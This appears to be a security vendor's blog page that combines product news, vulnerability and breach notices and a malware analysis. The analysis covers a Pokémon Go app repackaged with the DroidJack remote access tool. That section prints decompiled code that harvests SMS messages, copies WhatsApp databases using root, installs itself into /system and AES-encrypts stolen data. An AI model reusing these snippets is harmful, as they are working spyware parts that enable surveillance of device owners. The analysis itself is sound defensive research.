Trustlook Mobile Security Pre-installed on TECNO Phantom 6 and Phantom 6 Plus

Watch the intro video here

Africa’s leading mobile device maker TECNO Mobile, a subsidiary of Transsion Holdings has partnered with Trustlook, a next generation mobile security company. Visit https://www.tecno-mobile.com to get your new Phantom 6 mobile device, now pre-loaded with the Trustlook Mobile Security & Antivirus app.

Over the last decade, TECNO mobile has dominated the African mobile market to become one of the most sought after mobile brands in the region. Consistently producing high-end smartphone devices, these latest additions to the TECNO Phantom series – the Phantom 6 and Phantom 6 Plus are no exception. The Phantom 6 Plus even offers TECNO Mobile’s first tri-fold security combination (fingerprint, eye scanner and Trustlook Mobile Security behavioral protection).

Trustlook’s technology protects more than 300M users globally through its integration with leading apps and downloadable security offerings. Trustlook’s technology significantly reduces the threat vulnerability window thru advanced machine learning and behavioral analysis.

BadKernel Vulnerability Technical Details

360 researchers (Alpha Team) has recently uncovered a vulnerability that affects millions of Android phones.  Since it is especially widespread in China and can cause significant damage, it has been assigned CNNVD-201608-414 in the Chinese National Vulnerability Database of Information Security.  CNNVD is the Chinese equivalent of the US Common Vulnerabilities and Exposures system (CVE).

The vulnerability lies in the part of the Chrome V8 Engine responsible for JavaScript parsing.  It allows hackers to hijack the phone and remotely execute malicious code which could invade user privacy by accessing the camera and microphone, and to steal sensitive information such as credit card and password.

The flaw exists in version 3.20 to 4.2 of the Chrome V8 engine. The observe_accept_invalid exception type was incorrectly defined as observe_invalid_accept (see source), this error mistakenly allows open access to the kMessages key objects, which leaves an exploit allowing hackers to download and execute malicious code.

Versions of the Tencent’s X5.SDK library that integrated version 3.20 to 4.2 of the Chrome V8 engine are also affected.  The X5.SDK is used by many popular apps in China such as phone QQ, QQ space, Jingdong, 58 city, Sohu, Sina news.  These versions of apps are vulnerable to attacks.

Any app running on Android 4.4.4 to version 5.1 system and uses the WebView component are also vulnerable.

This exploit is introduced primarily via Social Engineering, such as an receiving email with a shared link from an infected friend, or an IM phishing message claimed to be from a well known source.  Once the user clicks on the link, the device will be infected with malicious code often leaving no detectable signs.

To check if a phone is infected

What to do if you are infected?

    • Upgrade to the latest phone software
    • Upgrade downloaded browsers
    • Be wary of emails and messages with links, even from people or organizations you know.  Never click on unknown URL, type it in browser bar instead.

Google Offers $200,000 to Find Android Vulnerabilities

Show me the money might become the new moniker in the hacking world. And with good reason. Google has announced it is going to offer up to $200,000 in prize money to the first team that can find a bug chain that can give remote access to multiple Android devices by just knowing their email address or phone numbers.

Announced by Google’s Project Zero research team, the contest began on 9/14/2016 and is scheduled to run through next March 14. Researchers are invited to find critical bugs in Android, specifically on Nexus 6P and Nexus 5x devices running builds that are current for the specific device.

This offer is largely in response to the widespread Android vulnerability discovered in August 2016 named Quadrooter that affected 900 million devices.

Google is banking on the prize amount being a motivator for hackers to find flaws in the ecosystem. The first prize in the competition is $200,000; the second prize is $100,000 and the third prize is $50,000. There will be additional awards for winning entries that are able to find flaws in the Google’s operating system.

800,000 Identities Stolen From Adult Porn Site Brazzers

brazzers-logo
Passwords, usernames and emails have all been made available for some 800,000 users in the latest big name data leak, this time from porn network Brazzers. That’s the number of email addresses that were retrieved by security monitoring firm Vigilante, though the leaked data is also said to contain plain-text passwords and usernames associated with those emails.

Despite claiming that it’s an old hack, Brazzers isn’t taking any chances and has shut down its forum temporarily while it investigates for any potential new breach in its security.

There are a couple ways to check if you have been part of this data breach. Use the Identity Check feature in the Trustlook Mobile Security app, or use the Have I Been Pwned website.

Beyond that, users are encouraged to change their password.

Trustlook Mobile Security SDK Whitepaper Now Available

The Trustlook Mobile Security SDK is a robust, feature-packed, and multi-layered security framework for building mobile security apps. Learn how you can use the SDK to build your security app with the newly release whitepaper. See how GO Security was able to use Trustlook’s SDK to build one of the most popular security app in the Google Play store.

Download here:
http://www.trustlook.com/sdk_whitepaper/

Pokémon Go bundles with Malicious Remote Administration Tool DroidJack

Due to the expanding popularity of Pokémon Go, the app has attracted more hacker’s attention than ever, because the popular game app can help hackers spread their malicious apps more efficiently. An app was recently discovered by Trustlook that is a Pokémon Go app repackaged with the RAT (Remote Administration Tool) tool DroidJack. The app appears to be a normal game, but actually can be used to control the user’s device. The research Trojan package can be identified as having the following characteristics:

  • MD5: d350cc8222792097317608ea95b283a8
  • SHA256: 15db22fd7d961f4d4bd96052024d353b3ff4bd135835d2644d94d74c925af3c4
  • Size: 184036 bytes
  • App name: 61029052
  • Package name: com.nianticlabs.pokemongo

The app is identical to the normal Pokémon Go app when it is running:

 
image02 image01

image04 image03

The app is signed with the following certificate, which does not belong to the Pokemon Go game developer:

image06

From the follow code structure images, the package “net.droidjack.server” can be found:

image05

The DroidJack RAT tool can perform the following malicious activities:

  • Get SMS Messages
  • Monitor/record calls
  • Get call logs
  • Browser bookmarks/history
  • WhatsApp Call Logs
  • GPS location
  • WhatsApp Chat
  • Record sound
  • Capture video
  • Take picture
  • Send device information
  • Install file to system folder 
  • Update itself

 

The following code snippets are responsible for collecting SMS messages:

protected void a()

 {

   ag localag = new ag(this.c);

   localag.b();

   Object localObject = Uri.parse(“content://sms/sent”);

   Cursor localCursor = this.c.getContentResolver().query((Uri)localObject, null, null, null, null);

   if (localCursor.getCount() > 0) {}

   for (;;)

   {

     if (!localCursor.moveToNext()) {

       return;

     }

     String str3 = localCursor.getString(localCursor.getColumnIndex(“body”));

     String str1 = localCursor.getString(localCursor.getColumnIndex(“address”));

     String str4 = localCursor.getString(localCursor.getColumnIndex(“date”));

     String str2 = a(str1);

     localObject = str2;

[…]  

 protected void b()

 {

   ag localag = new ag(this.c);

   localag.a();

   Object localObject = Uri.parse(“content://sms/inbox”);

   Cursor localCursor = this.c.getContentResolver().query((Uri)localObject, null, null, null, null);

   if (localCursor.getCount() > 0) {}

   for (;;)

   {

     if (!localCursor.moveToNext()) {

       return;

     }

     String str3 = localCursor.getString(localCursor.getColumnIndex(“body”));

     String str1 = localCursor.getString(localCursor.getColumnIndex(“address”));

     String str2 = a(str1);

     localObject = str2;

     if (str2 == null) {

       localObject = str1;

     }

     localag.a(str1, (String)localObject, str3, localCursor.getString(localCursor.getColumnIndex(“date”)));

   }

 }

 

The following code snippets are used to retrieve WhatsApp logs:


protected byte[] a()

 {

   try

   {

     this.d = new File(Environment.getExternalStorageDirectory() + “/WhatsApp/Databases/wams.db”);

     Object localObject = new DataOutputStream(Runtime.getRuntime().exec(“su”).getOutputStream());

     ((DataOutputStream)localObject).writeBytes(“cp data/data/com.whatsapp/databases/msgstore.db ” + this.d.getAbsolutePath());

     ((DataOutputStream)localObject).writeBytes(“nexit”);

     Thread.sleep(10000L);

     if (this.d.exists()) {}

     return “NoWA”.getBytes();

   }

 

The following code snippets are used to install files to the system folder:

public class FBDBSender

protected byte[] c()

 {

   try

   {

     Object localObject = new File(this.a.getPackageManager().getApplicationInfo(this.a.getPackageName(), 128).sourceDir);

     DataOutputStream localDataOutputStream = new DataOutputStream(Runtime.getRuntime().exec(“su”).getOutputStream());

     localDataOutputStream.writeBytes(“mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /systemn”);

     localDataOutputStream.writeBytes(“cp -rp ” + ((File)localObject).getAbsolutePath() + ” /system/app/” + ((File)localObject).getName());

     localDataOutputStream.writeBytes(“nmount -o remount,ro -t yaffs2 /dev/block/mtdblock3 /system”);

     localDataOutputStream.writeBytes(“nexit”);

     Thread.sleep(10000L);

     localObject = “Ack”.getBytes();

     return localObject;

   }


The malware may encrypt the collected data using AES before sending it out:

public class aj

{

 private static final byte[] a = { 76, 82, 83, 65, 78, 74, 85, 73, 83, 84, 72, 69, 82, 65, 74, 65 };

 

 public static String a(String paramString)

 {

   Key localKey = a();

   Cipher localCipher = Cipher.getInstance(“AES”);

   localCipher.init(1, localKey);

   return Base64.encodeToString(localCipher.doFinal(paramString.getBytes()), 0);

 }

 

 private static Key a()

 {

   return new SecretKeySpec(a, “AES”);

 }

 

 public static String b(String paramString)

 {

   Key localKey = a();

   Cipher localCipher = Cipher.getInstance(“AES”);

   localCipher.init(2, localKey);

   return new String(localCipher.doFinal(Base64.decode(paramString, 0)));

 }

}

   

Summary

Installing apps from third-party sources may expose your device to potential threats. Downloading from a trusted source is a way to keep devices secure. Installing a security app such as Trustlook Mobile Security & Antivirus also help to prevent identity theft and safeguard you online.